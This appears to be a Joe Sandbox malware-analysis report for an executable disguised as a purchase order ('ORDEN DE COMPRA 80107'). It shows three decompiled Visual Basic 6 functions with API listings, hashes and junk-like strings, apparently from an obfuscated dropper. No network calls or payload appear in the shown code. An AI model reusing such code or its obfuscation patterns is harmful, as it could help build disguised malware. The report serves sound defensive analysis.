Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$Move$CheckHresultListNew2$ChkstkCopy$#542#581#616#617#670#696
String ID: 10/10/10$Fedthas
API String ID: 963968338-4011922955
Opcode ID: 9297553a9b2c911bccad546b7b4b928d0ca1b1795ec815a1ec52219579dce611
Instruction ID: 1265f79de5ca370d2f2c9ff50bbf775da0b2c9f88c82094767e5ad9048ca4dbf
Opcode Fuzzy Hash: 9297553a9b2c911bccad546b7b4b928d0ca1b1795ec815a1ec52219579dce611
Instruction Fuzzy Hash: 5DB12B71A00218AFCB10EFA4C845FDDBBB4BF48308F50406AF506BB2A2DB799945CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00428242 Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00428242(void* __ebx, void* __edi, void* __esi, signed int __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				char _v108;
				char* _v132;
				intOrPtr _v140;
				short _v144;
				intOrPtr* _v148;
				signed int _v152;
				short _v156;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr _v192;
				signed int _v200;
				char* _t111;
				signed int _t115;
				char* _t118;
				signed int _t120;
				char* _t131;
				char* _t135;
				signed int _t139;
				char* _t146;
				signed int _t150;
				char* _t151;
				intOrPtr _t171;
				void* _t181;
				void* _t183;
				intOrPtr _t184;
				signed int _t196;
				signed int _t197;

				_t196 = __fp0;
				_t184 = _t183 - 0xc;
				 *[fs:0x0] = _t184;
				L00401330();
				_v16 = _t184;
				_v12 = 0x4012d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401336, _t181);
				if( *0x42a010 != 0) {
					_v168 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v168 = 0x42a010;
				}
				_t111 =  &_v56;
				L00401564();
				_v148 = _t111;
				_t115 =  *((intOrPtr*)( *_v148 + 0x108))(_v148,  &_v40, _t111,  *((intOrPtr*)( *((intOrPtr*)( *_v168)) + 0x334))( *_v168));
				asm("fclex");
				_v152 = _t115;
				if(_v152 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x40faec);
					_push(_v148);
					_push(_v152);
					L00401558();
					_v172 = _t115;
				}
				_v132 = L"sion";
				_v140 = 8;
				L0040151C();
				_push(0xd6);
				_push( &_v92);
				_push( &_v108);
				L004013F0();
				_v68 = 0x3e;
				_v76 = 2;
				_t118 =  &_v76;
				_push(_t118);
				_push(0xb8);
				_push(_v40);
				L004013EA();
				L00401588();
				_push(_t118);
				_push(0xd9);
				_push( &_v108);
				_t120 =  &_v44;
				_push(_t120);
				L0040142C();
				_push(_t120);
				L004013E4();
				L00401588();
				_push(_t120);
				L00401432();
				asm("sbb eax, eax");
				_v156 =  ~( ~_t120 + 1);
				_push( &_v52);
				_push( &_v48);
				_push( &_v44);
				_push( &_v40);
				_push(4);
				L004014E0();
				L00401552();
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401576();
				_t131 = _v156;
				if(_t131 != 0) {
					if( *0x42a010 != 0) {
						_v176 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v176 = 0x42a010;
					}
					_t135 =  &_v56;
					L00401564();
					_v148 = _t135;
					_t139 =  *((intOrPtr*)( *_v148 + 0xa8))(_v148,  &_v144, _t135,  *((intOrPtr*)( *((intOrPtr*)( *_v176)) + 0x368))( *_v176));
					asm("fclex");
					_v152 = _t139;
					if(_v152 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x40fddc);
						_push(_v148);
						_push(_v152);
						L00401558();
						_v180 = _t139;
					}
					_push(_v144);
					_push( &_v76);
					L00401498();
					_push( &_v76);
					L00401570();
					L00401588();
					L00401552();
					L0040158E();
					if( *0x42a010 != 0) {
						_v184 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v184 = 0x42a010;
					}
					_t171 =  *((intOrPtr*)( *_v184));
					_t146 =  &_v56;
					L00401564();
					_v148 = _t146;
					_t150 =  *((intOrPtr*)( *_v148 + 0x138))(_v148,  &_v60, _t146,  *((intOrPtr*)(_t171 + 0x310))( *_v184));
					asm("fclex");
					_v152 = _t150;
					if(_v152 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x40f9cc);
						_push(_v148);
						_push(_v152);
						L00401558();
						_v188 = _t150;
					}
					_push(0);
					_push(0);
					_push(_v60);
					_t151 =  &_v76;
					_push(_t151);
					L004014C8();
					_push(_t151);
					L004014E6();
					_v192 = _t151;
					asm("fild dword [ebp-0xbc]");
					_v200 = _t196;
					_t197 = _v200;
					_push(_t171);
					_push(_t171);
					_v172 = _t197;
					L004013D8();
					_push(_t171);
					_push(_t171);
					_v180 = _t197;
					L004013DE();
					L00401588();
					_push( &_v60);
					_t131 =  &_v56;
					_push(_t131);
					_push(2);
					L004014DA();
					L0040158E();
				}
				_v36 = 0x1829;
				asm("wait");
				_push(0x42865c);
				L00401516();
				L00401516();
				return _t131;
			}

0x00428242
0x00428245
0x00428254
0x00428260
0x00428268
0x0042826b
0x00428272
0x00428281
0x0042828b
0x004282a8
0x0042828d
0x0042828d
0x00428292
0x00428297
0x0042829c
0x0042829c
0x004282cc
0x004282d0
0x004282d5
0x004282ed
0x004282f3
0x004282f5
0x00428302
0x00428327
0x00428304
0x00428304
0x00428309
0x0042830e
0x00428314
0x0042831a
0x0042831f
0x0042831f
0x0042832e
0x00428335
0x00428348
0x0042834d
0x00428355
0x00428359
0x0042835a
0x0042835f
0x00428366
0x0042836d
0x00428370
0x00428371
0x00428376
0x00428379
0x00428383
0x00428388
0x00428389
0x00428391
0x00428392
0x00428395
0x00428396
0x0042839b
0x0042839c
0x004283a6
0x004283ab
0x004283ac
0x004283b3
0x004283b8
0x004283c2
0x004283c6
0x004283ca
0x004283ce
0x004283cf
0x004283d1
0x004283dc
0x004283e4
0x004283e8
0x004283ec
0x004283ed
0x004283ef
0x004283f7
0x00428400
0x0042840d
0x0042842a
0x0042840f
0x0042840f
0x00428414
0x00428419
0x0042841e
0x0042841e
0x0042844e
0x00428452
0x00428457
0x00428472
0x00428478
0x0042847a
0x00428487
0x004284ac
0x00428489
0x00428489
0x0042848e
0x00428493
0x00428499
0x0042849f
0x004284a4
0x004284a4
0x004284ba
0x004284be
0x004284bf
0x004284c7
0x004284c8
0x004284d2
0x004284da
0x004284e2
0x004284ee
0x0042850b
0x004284f0
0x004284f0
0x004284f5
0x004284fa
0x004284ff
0x004284ff
0x00428525
0x0042852f
0x00428533
0x00428538
0x00428550
0x00428556
0x00428558
0x00428565
0x0042858a
0x00428567
0x00428567
0x0042856c
0x00428571
0x00428577
0x0042857d
0x00428582
0x00428582
0x00428591
0x00428593
0x00428595
0x00428598
0x0042859b
0x0042859c
0x004285a4
0x004285a5
0x004285aa
0x004285b0
0x004285b6
0x004285bc
0x004285c2
0x004285c3
0x004285c4
0x004285c7
0x004285cc
0x004285cd
0x004285ce
0x004285d1
0x004285db
0x004285e3
0x004285e4
0x004285e7
0x004285e8
0x004285ea
0x004285f5
0x004285f5
0x004285fa
0x00428600
0x00428601
0x0042864e
0x00428656
0x0042865b

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00428260
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 00428297
__vbaObjSet.MSVBVM60(?,00000000), ref: 004282D0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,00000108), ref: 0042831A
__vbaVarDup.MSVBVM60(00000000,?,0040FAEC,00000108), ref: 00428348
#515.MSVBVM60(?,?,000000D6), ref: 0042835A
#631.MSVBVM60(?,000000B8,00000002,?,?,000000D6), ref: 00428379
__vbaStrMove.MSVBVM60(?,000000B8,00000002,?,?,000000D6), ref: 00428383
__vbaStrVarVal.MSVBVM60(?,?,000000D9,00000000,?,000000B8,00000002,?,?,000000D6), ref: 00428396
#514.MSVBVM60(00000000,?,?,000000D9,00000000,?,000000B8,00000002,?,?,000000D6), ref: 0042839C
__vbaStrMove.MSVBVM60(00000000,?,?,000000D9,00000000,?,000000B8,00000002,?,?,000000D6), ref: 004283A6
__vbaStrCmp.MSVBVM60(00000000,00000000,?,?,000000D9,00000000,?,000000B8,00000002,?,?,000000D6), ref: 004283AC
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000,?,?,000000D9,00000000,?,000000B8,00000002,?,?), ref: 004283D1
__vbaFreeObj.MSVBVM60(?,?,?,?,00401336), ref: 004283DC
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00401336), ref: 004283EF
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,?,?,?,?,00401336), ref: 00428419
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428452
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FDDC,000000A8), ref: 0042849F
#698.MSVBVM60(?,?), ref: 004284BF
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 004284C8
__vbaStrMove.MSVBVM60(?,?,?), ref: 004284D2
__vbaFreeObj.MSVBVM60(?,?,?), ref: 004284DA
__vbaFreeVar.MSVBVM60(?,?,?), ref: 004284E2
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?), ref: 004284FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428533
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,00000138), ref: 0042857D
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0042859C
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004285A5
#587.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004285C7
__vbaStrR8.MSVBVM60(?,?,?,?,00000000), ref: 004285D1
__vbaStrMove.MSVBVM60(?,?,?,?,00000000), ref: 004285DB
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00000000), ref: 004285EA
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004285F5
__vbaFreeStr.MSVBVM60(0042865C), ref: 0042864E
__vbaFreeStr.MSVBVM60(0042865C), ref: 00428656

Strings

>, xrefs: 0042835F

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$Move$CheckHresultListNew2$#514#515#587#631#698CallChkstkLate
String ID: >
API String ID: 3695083082-325317158
Opcode ID: e81b7bce2800f800a33b8256bca8079d08204bee55f40034ef4f30b85f8c1d76
Instruction ID: 4238a5bba8745463500ca581e70c813d9abf65d46987835da584d00c5c6ee7ff
Opcode Fuzzy Hash: e81b7bce2800f800a33b8256bca8079d08204bee55f40034ef4f30b85f8c1d76
Instruction Fuzzy Hash: 67B1FA71A00218AFDB10EFA1CC45FDEB7B9AF04304F5044AAF50ABB1A2DB795A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00427EBE Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00427EBE(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				char _v68;
				char _v84;
				intOrPtr _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				char _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v148;
				intOrPtr _v156;
				intOrPtr _v164;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v212;
				intOrPtr _v216;
				intOrPtr* _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				signed int _t92;
				char* _t98;
				signed int _t102;
				signed int _t109;
				char* _t111;
				char* _t113;
				char* _t127;
				intOrPtr _t159;

				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t159;
				L00401330();
				_v12 = _t159;
				_v8 = 0x4012c0;
				L0040146E();
				_t92 = 0xd4;
				if(0xd4 == 0xa8) {
					_v156 = 0x40fd90;
					_v164 = 8;
					L0040151C();
					_push( &_v68);
					_push(0x18);
					_push( &_v84);
					L004013FC();
					if( *0x42a010 != 0) {
						_v220 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v220 = 0x42a010;
					}
					_t98 =  &_v48;
					L00401564();
					_v200 = _t98;
					_t102 =  *((intOrPtr*)( *_v200 + 0x160))(_v200,  &_v52, _t98,  *((intOrPtr*)( *((intOrPtr*)( *_v220)) + 0x324))( *_v220));
					asm("fclex");
					_v204 = _t102;
					if(_v204 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40faec);
						_push(_v200);
						_push(_v204);
						L00401558();
						_v224 = _t102;
					}
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v212 = _v52;
					_v52 = _v52 & 0x00000000;
					_v92 = _v212;
					_v100 = 9;
					_push(1);
					_push(1);
					_push( &_v116);
					_push( &_v100);
					_push( &_v132);
					L004013F6();
					_v140 = 0x34a7df90;
					_v136 = 0x5afe;
					_v148 = 6;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v148);
					L00401492();
					L00401588();
					_t109 = _v44;
					_v216 = _t109;
					_v44 = _v44 & 0x00000000;
					_push(0);
					_push(0xffffffff);
					_push(1);
					L00401588();
					_push(_t109);
					_push( &_v132);
					_t111 =  &_v36;
					_push(_t111);
					L0040142C();
					_push(_t111);
					_push( &_v84);
					_t113 =  &_v32;
					_push(_t113);
					L0040142C();
					_push(_t113);
					L00401414();
					L00401588();
					_push( &_v44);
					_push( &_v40);
					_push( &_v36);
					_push( &_v32);
					_push(4);
					L004014E0();
					L00401552();
					_push( &_v132);
					_push( &_v84);
					_push( &_v148);
					_push( &_v116);
					_push( &_v100);
					_push( &_v68);
					_push(6);
					L00401576();
					if( *0x42a010 != 0) {
						_v228 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v228 = 0x42a010;
					}
					_t127 =  &_v48;
					L00401564();
					_v200 = _t127;
					_t92 =  *((intOrPtr*)( *_v200 + 0x48))(_v200,  &_v32, _t127,  *((intOrPtr*)( *((intOrPtr*)( *_v228)) + 0x328))( *_v228));
					asm("fclex");
					_v204 = _t92;
					if(_v204 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40fb2c);
						_push(_v200);
						_push(_v204);
						L00401558();
						_v232 = _t92;
					}
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push(_v32);
					_push(L"MATEMATIKKER");
					_push(L"Barkinji2");
					L00401414();
					L00401588();
					L00401516();
					L00401552();
				}
				_push(0x42822f);
				L00401516();
				L00401516();
				return _t92;
			}

0x00427ec3
0x00427ece
0x00427ecf
0x00427edb
0x00427ee3
0x00427ee6
0x00427ef1
0x00427ef6
0x00427efe
0x00427f04
0x00427f0e
0x00427f21
0x00427f29
0x00427f2a
0x00427f2f
0x00427f30
0x00427f3c
0x00427f59
0x00427f3e
0x00427f3e
0x00427f43
0x00427f48
0x00427f4d
0x00427f4d
0x00427f7d
0x00427f81
0x00427f86
0x00427f9e
0x00427fa4
0x00427fa6
0x00427fb3
0x00427fd8
0x00427fb5
0x00427fb5
0x00427fba
0x00427fbf
0x00427fc5
0x00427fcb
0x00427fd0
0x00427fd0
0x00427fdf
0x00427fe6
0x00427ff0
0x00427ff6
0x00428000
0x00428003
0x0042800a
0x0042800c
0x00428011
0x00428015
0x00428019
0x0042801a
0x0042801f
0x00428029
0x00428033
0x0042803d
0x0042803f
0x00428041
0x00428043
0x0042804b
0x0042804c
0x00428056
0x0042805b
0x0042805e
0x00428064
0x00428068
0x0042806a
0x0042806c
0x00428077
0x0042807c
0x00428080
0x00428081
0x00428084
0x00428085
0x0042808a
0x0042808e
0x0042808f
0x00428092
0x00428093
0x00428098
0x00428099
0x004280a3
0x004280ab
0x004280af
0x004280b3
0x004280b7
0x004280b8
0x004280ba
0x004280c5
0x004280cd
0x004280d1
0x004280d8
0x004280dc
0x004280e0
0x004280e4
0x004280e5
0x004280e7
0x004280f6
0x00428113
0x004280f8
0x004280f8
0x004280fd
0x00428102
0x00428107
0x00428107
0x00428137
0x0042813b
0x00428140
0x00428158
0x0042815b
0x0042815d
0x0042816a
0x0042818c
0x0042816c
0x0042816c
0x0042816e
0x00428173
0x00428179
0x0042817f
0x00428184
0x00428184
0x00428193
0x00428195
0x00428197
0x00428199
0x0042819c
0x004281a1
0x004281a6
0x004281b0
0x004281b8
0x004281c0
0x004281c0
0x004281c5
0x00428221
0x00428229
0x0042822e

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00427EDB
__vbaUI1I2.MSVBVM60(?,?,?,?,00401336), ref: 00427EF1
__vbaVarDup.MSVBVM60 ref: 00427F21
#607.MSVBVM60(?,00000018,?), ref: 00427F30
__vbaNew2.MSVBVM60(004101D4,0042A010,?,00000018,?), ref: 00427F48
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000018,?), ref: 00427F81
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,00000160,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00427FCB
#660.MSVBVM60(?,00000009,0000000A,00000001,00000001), ref: 0042801A
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,00000009,0000000A,00000001,00000001), ref: 0042804C
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,00000009,0000000A,00000001,00000001), ref: 00428056
__vbaStrMove.MSVBVM60(00000001,000000FF,00000000,00000006,000000FF,000000FE,000000FE,000000FE,?,00000009,0000000A,00000001,00000001), ref: 00428077
__vbaStrVarVal.MSVBVM60(?,?,00000000,00000001,000000FF,00000000,00000006,000000FF,000000FE,000000FE,000000FE,?,00000009,0000000A,00000001,00000001), ref: 00428085
__vbaStrVarVal.MSVBVM60(?,?,00000000,?,?,00000000,00000001,000000FF,00000000,00000006,000000FF,000000FE,000000FE,000000FE,?,00000009), ref: 00428093
#712.MSVBVM60(00000000,?,?,00000000,?,?,00000000,00000001,000000FF,00000000,00000006,000000FF,000000FE,000000FE,000000FE,?), ref: 00428099
__vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,00000001,000000FF,00000000,00000006,000000FF,000000FE,000000FE,000000FE,?), ref: 004280A3
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000,00000000,?,?,00000000,?,?,00000000,00000001,000000FF,00000000,00000006), ref: 004280BA
__vbaFreeObj.MSVBVM60 ref: 004280C5
__vbaFreeVarList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 004280E7
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00428102
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042813B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FB2C,00000048), ref: 0042817F
#712.MSVBVM60(Barkinji2,MATEMATIKKER,?,00000001,000000FF,00000000), ref: 004281A6
__vbaStrMove.MSVBVM60(Barkinji2,MATEMATIKKER,?,00000001,000000FF,00000000), ref: 004281B0
__vbaFreeStr.MSVBVM60(Barkinji2,MATEMATIKKER,?,00000001,000000FF,00000000), ref: 004281B8
__vbaFreeObj.MSVBVM60(Barkinji2,MATEMATIKKER,?,00000001,000000FF,00000000), ref: 004281C0
__vbaFreeStr.MSVBVM60(0042822F,?,?,?,?,00401336), ref: 00428221
__vbaFreeStr.MSVBVM60(0042822F,?,?,?,?,00401336), ref: 00428229

Strings

MATEMATIKKER, xrefs: 0042819C
Barkinji2, xrefs: 004281A1

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$Move$#712CheckHresultListNew2$#607#660#703Chkstk
String ID: Barkinji2$MATEMATIKKER
API String ID: 1497305280-2921519146
Opcode ID: 37fba29984b5bd26e0ef2caaa0d9b768e484ca1c7d1fa5f863da3054744c178c
Instruction ID: 89cb28d241000f5fa250c81da86fad441c912021c005efa3bba9fa6ae61f6aa2
Opcode Fuzzy Hash: 37fba29984b5bd26e0ef2caaa0d9b768e484ca1c7d1fa5f863da3054744c178c
Instruction Fuzzy Hash: 1D911D71900228AFDB20DF94CC45FDEB7B8BB04314F5045AAE116B71E1DB785A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0042645D Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E0042645D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _v104;
				char* _t86;
				signed int _t89;
				char* _t93;
				signed int _t97;
				signed int _t103;
				signed int _t107;
				void* _t125;
				void* _t127;
				intOrPtr _t128;

				_t128 = _t127 - 0xc;
				 *[fs:0x0] = _t128;
				L00401330();
				_v16 = _t128;
				_v12 = 0x4011e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x401336, _t125);
				L00401504();
				if( *0x42a010 != 0) {
					_v80 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v80 = 0x42a010;
				}
				_t86 =  &_v36;
				L00401564();
				_v56 = _t86;
				_t89 =  *((intOrPtr*)( *_v56 + 0x1c8))(_v56, _t86,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x338))( *_v80));
				asm("fclex");
				_v60 = _t89;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x40fabc);
					_push(_v56);
					_push(_v60);
					L00401558();
					_v84 = _t89;
				}
				L00401552();
				if( *0x42a010 != 0) {
					_v88 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v88 = 0x42a010;
				}
				_t93 =  &_v36;
				L00401564();
				_v56 = _t93;
				_v44 = 1;
				_v52 = 2;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t97 =  *((intOrPtr*)( *_v56 + 0x1d0))(_v56, 0x10, _t93,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x2fc))( *_v88));
				asm("fclex");
				_v60 = _t97;
				if(_v60 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x40fafc);
					_push(_v56);
					_push(_v60);
					L00401558();
					_v92 = _t97;
				}
				L00401552();
				if( *0x42a6c0 != 0) {
					_v96 = 0x42a6c0;
				} else {
					_push(0x42a6c0);
					_push(0x40fbb8);
					L0040155E();
					_v96 = 0x42a6c0;
				}
				_v56 =  *_v96;
				_t103 =  *((intOrPtr*)( *_v56 + 0x4c))(_v56,  &_v36);
				asm("fclex");
				_v60 = _t103;
				if(_v60 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x40fba8);
					_push(_v56);
					_push(_v60);
					L00401558();
					_v100 = _t103;
				}
				_v64 = _v36;
				_t107 =  *((intOrPtr*)( *_v64 + 0x28))(_v64);
				asm("fclex");
				_v68 = _t107;
				if(_v68 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x40fbc8);
					_push(_v64);
					_push(_v68);
					L00401558();
					_v104 = _t107;
				}
				L00401552();
				_v28 = 0x205a;
				_push(0x426698);
				L00401516();
				return _t107;
			}

0x00426460
0x0042646f
0x00426479
0x00426481
0x00426484
0x0042648b
0x0042649a
0x004264a3
0x004264af
0x004264c9
0x004264b1
0x004264b1
0x004264b6
0x004264bb
0x004264c0
0x004264c0
0x004264e4
0x004264e8
0x004264ed
0x004264f8
0x004264fe
0x00426500
0x00426507
0x00426523
0x00426509
0x00426509
0x0042650e
0x00426513
0x00426516
0x00426519
0x0042651e
0x0042651e
0x0042652a
0x00426536
0x00426550
0x00426538
0x00426538
0x0042653d
0x00426542
0x00426547
0x00426547
0x0042656b
0x0042656f
0x00426574
0x00426577
0x0042657e
0x00426588
0x00426592
0x00426593
0x00426594
0x00426595
0x0042659e
0x004265a4
0x004265a6
0x004265ad
0x004265c9
0x004265af
0x004265af
0x004265b4
0x004265b9
0x004265bc
0x004265bf
0x004265c4
0x004265c4
0x004265d0
0x004265dc
0x004265f6
0x004265de
0x004265de
0x004265e3
0x004265e8
0x004265ed
0x004265ed
0x00426602
0x00426611
0x00426614
0x00426616
0x0042661d
0x00426636
0x0042661f
0x0042661f
0x00426621
0x00426626
0x00426629
0x0042662c
0x00426631
0x00426631
0x0042663d
0x00426648
0x0042664b
0x0042664d
0x00426654
0x0042666d
0x00426656
0x00426656
0x00426658
0x0042665d
0x00426660
0x00426663
0x00426668
0x00426668
0x00426674
0x00426679
0x0042667f
0x00426692
0x00426697

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00426479
__vbaStrCopy.MSVBVM60(?,?,?,?,00401336), ref: 004264A3
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 004264BB
__vbaObjSet.MSVBVM60(?,00000000), ref: 004264E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000001C8), ref: 00426519
__vbaFreeObj.MSVBVM60 ref: 0042652A
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00426542
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042656F
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426588
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,000001D0), ref: 004265BF
__vbaFreeObj.MSVBVM60 ref: 004265D0
__vbaNew2.MSVBVM60(0040FBB8,0042A6C0), ref: 004265E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FBA8,0000004C), ref: 0042662C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FBC8,00000028), ref: 00426663
__vbaFreeObj.MSVBVM60 ref: 00426674
__vbaFreeStr.MSVBVM60(00426698), ref: 00426692

Strings

Z , xrefs: 00426679

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
